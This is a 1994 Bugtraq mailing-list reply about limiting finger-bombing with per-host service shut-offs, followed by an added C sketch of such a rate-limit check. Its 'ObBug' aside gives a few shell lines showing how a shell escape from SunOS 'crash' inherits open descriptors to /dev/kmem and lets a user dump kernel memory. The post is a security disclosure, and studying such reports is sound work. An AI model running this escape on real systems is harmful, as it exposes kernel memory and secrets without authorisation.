Bugtraq
mailing list archives
Re: finger-bombing, abuse timeout
From: chowes () helix net (Charles Howes)
Date: Thu, 13 Oct 1994 21:39:46 -0700 (PDT)
On Wed, 12 Oct 1994, That Whispering Wolf... wrote:
> This does bring up an interesting idea for improvements to xinetd/inetd
> or whatever, though -- Why not have a config option that you can set so
> that if more than X number of requests for Y service were received from
> Z host in A time, the service shut off requests from that host for
> 5/10/15 minutes. Would that feature really be useful, and be worth the
> overhead? Personally, -I- don't think so, but if your site comes under
> regular attacks from such things, it may be a handy feep to have. Now, if
> someone would just code it. *grin*
Think it's been done already for some services like 'rusers'. Mind
you, this is just a rumor. Your mileage may vary.
(In other words, I don't know if it's an rusers thing, an RPC thing,
a portmapper thing, or an inetd thing.)
I *do* know that init does it for respawning gettys. So, if a
hardware failure causes getty to quit repeatedly, it doesn't chew cpu
time.
ObBug: The shell escape from 'crash' on SunOS... file descriptors are
left open to /dev/kmem and /dev/mem, among other things.
% crash
dumpfile = /dev/mem, ....
!/bin/sh
% strings <&9 >/tmp/out &
% id
.... egid=2(kmem) ....
Ooops. I understated the problem.
--
Charles Howes -- chowes () helix net
Always tell the truth, then you make it the other bloke's problem!
- Sean Connery, 1971
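
Added example, not part of the original post or of any inetd/xinetd source: a sketch of the per-host, per-service shut-off proposed in the quoted message, as a check a super-server could make before spawning a service. The names `allow` and `lookup` and the values 5 requests / 60 s / 300 s are assumptions chosen for illustration.

```c
#include <stdio.h>
#include <string.h>
#include <time.h>

/* Assumed policy values standing in for X, A and the shut-off time. */
#define MAX_REQS 5     /* X: requests allowed per window */
#define WINDOW   60    /* A: window length in seconds */
#define LOCKOUT  300   /* shut-off period in seconds (5 minutes) */
#define SLOTS    64    /* number of (host, service) pairs tracked */

struct slot {
    char   host[46], svc[16];    /* Z: peer address, Y: service name */
    time_t start, banned_until;  /* window start; shut-off end (0 = none) */
    int    count;                /* requests seen in the current window */
};
static struct slot table[SLOTS];

/* Find the slot for (host, svc), else take a free one, else the stalest.
 * Fixed-size state bounds the overhead, but eviction can forget a host. */
static struct slot *lookup(const char *host, const char *svc, time_t now)
{
    struct slot *victim = &table[0];
    for (int i = 0; i < SLOTS; i++) {
        struct slot *s = &table[i];
        if (s->host[0] && !strcmp(s->host, host) && !strcmp(s->svc, svc))
            return s;
        if (victim->host[0] && (!s->host[0] || s->start < victim->start))
            victim = s;
    }
    memset(victim, 0, sizeof *victim);
    snprintf(victim->host, sizeof victim->host, "%s", host);
    snprintf(victim->svc, sizeof victim->svc, "%s", svc);
    victim->start = now;
    return victim;
}

/* Return 1 to accept a connection from host to svc at time now, 0 to refuse. */
int allow(const char *host, const char *svc, time_t now)
{
    struct slot *s = lookup(host, svc, now);
    if (now < s->banned_until) return 0;   /* still inside the shut-off */
    if (now - s->start >= WINDOW) { s->start = now; s->count = 0; }
    if (++s->count > MAX_REQS) {           /* more than X requests in A time */
        s->count = 0;
        s->start = s->banned_until = now + LOCKOUT;  /* banned slots look newest */
        return 0;
    }
    return 1;
}
```

Because a shut-off slot carries a start time in the future, it is the last candidate for eviction when the table fills, so flooding from many addresses is less likely to clear an existing shut-off.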